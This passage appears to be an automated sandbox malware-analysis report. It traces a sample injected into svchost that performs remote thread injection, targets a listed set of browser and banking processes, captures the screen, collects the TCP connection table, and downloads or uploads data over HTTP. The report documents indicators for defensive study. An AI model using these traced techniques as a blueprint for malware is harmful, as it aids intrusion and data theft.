                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C9340C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93424
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93435
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C93456
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93472
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93483
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2650560580-3024904723
                                                                                                                                                                                                                    • Opcode ID: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                                    • Instruction ID: 1a168fb6bc5f68d4b946373794debbb1d69b3a86ee86773ba1e2fdee5f1489b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92619571A40284BBEF12DF64CC89FAA77ACEF85B04F158599FD059B280DB74DA41CB60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C9395E
                                                                                                                                                                                                                    • GetWindowDC.USER32(00000000), ref: 02C93965
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C9397A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CompatibleCreateDesktop
                                                                                                                                                                                                                    • String ID: ($BM
                                                                                                                                                                                                                    • API String ID: 3720047489-2980357723
                                                                                                                                                                                                                    • Opcode ID: 877537c5a62760423418052294a140d0a62b69241ec763b07aa43e08c1110234
                                                                                                                                                                                                                    • Instruction ID: 66da597546c0650b0bfef3b024a0a811454a89ce9df7fc2a3b6aa3b1ec11ce2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 877537c5a62760423418052294a140d0a62b69241ec763b07aa43e08c1110234
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D516271E40258BBDB11DFA4EC48BAEBBB9FF88711F104659F904E7280DB709D118BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                    • DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                    • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                    • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                                    • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                                    • API String ID: 1656757314-3977723178
                                                                                                                                                                                                                    • Opcode ID: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                                    • Instruction ID: d45695dd1716ebac61938a8b3cd0950e38a12e6e9132130ccafc4e5caf358cfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8121CD73E8425867E721E7A49C41FDAB76CDF94B14F0045D5FA88E7080DAF19AC48B91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77041
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C77052
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77060
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C77069
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7707F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C77091
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C770B9
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C770D2
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 02C770DD
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 02C770E9
                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 02C770F4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                                    • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0#v$\explorer.exe
                                                                                                                                                                                                                    • API String ID: 2248524772-2059955476
                                                                                                                                                                                                                    • Opcode ID: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                                    • Instruction ID: 89f55bf59260a55909fb45ec8e651e1948a1b63d5d2c83ccde98a960c91ce188
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39210831E847446BE322BB759C09F6AFB9CAFC0B10F004655F95493181DBB4D9188AE2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocfree$exit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 337157181-0
                                                                                                                                                                                                                    • Opcode ID: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                                    • Instruction ID: 67329b314172805e52ad59086c6dbb5ba13a56f959d6b419cfae029237b9aa8e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF1CF71A0065A9FDB20CF98D884BAEB7B5FF88314F144169ED05A7340D771EE51CBA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|, xrefs: 02C863E2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                    • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|
                                                                                                                                                                                                                    • API String ID: 3461290786-860058239
                                                                                                                                                                                                                    • Opcode ID: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                                    • Instruction ID: 1acad026bad8bc81f15bff71473b071b2aa7c70764d43b849abcc9449434b30f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC319470D41254EFDB21DF65D849B9EB7BCFF88718F1085A9E849D3240D7309A45CB61
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C76A4C
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 02C76A5F
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                      • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C76A6E
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76A87
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C76A8E
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C76AA4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76AE9
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C76B03
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C76B16
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                                    • String ID: 80f507eba$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                                    • API String ID: 1400009243-1487560610
                                                                                                                                                                                                                    • Opcode ID: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                                    • Instruction ID: cab2f2639501efa66fa813353dfb62881e3343080eb70cdf95d92355d2c32780
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A31F272A40255ABDB21CF61CC88BAAB77CFF94B10F144655FE4497280E7B0AD91CFA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029A1451
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029A1515
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_29a0000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3550616410-0
                                                                                                                                                                                                                    • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                    • Instruction ID: bb8178fee0d07ba4466ffa7705655954c1ec0c1b777c56eb866e195d8b30916b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB914BB5D00719AFCB24DFE8C860BAEB7BAAF88354F154559E809B7344D734AA01CF94

                                                                                                                                                                                                                    Control-flow Graph
                                                                                                                                                                                                                    [Figure: control-flow graph of the code starting at 02C740F0; nodes are marked Executed or Not Executed]
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,762335B0,00000000), ref: 02C7410D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C74110
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74124
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C74194
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741A2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C741A5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741B2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C741B5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C741CD
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C741D0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C741E0
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C741FA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74207
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7420A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7421B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7421E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000083), ref: 02C74249
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7424C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74263
                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 02C742D9
                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 02C742EC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74307
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74313
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C74316
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74323
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C74326
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C74332
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C74335
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74342
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C74345
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000C00,00000000,00000001,?,00000000), ref: 02C743A2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743AB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C743AE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743BB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C743BE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate$Allocmemset$Tablehtons$FileWrite_snprintf
                                                                                                                                                                                                                    • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83655
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                                    • GET, xrefs: 02C83712
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83778
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
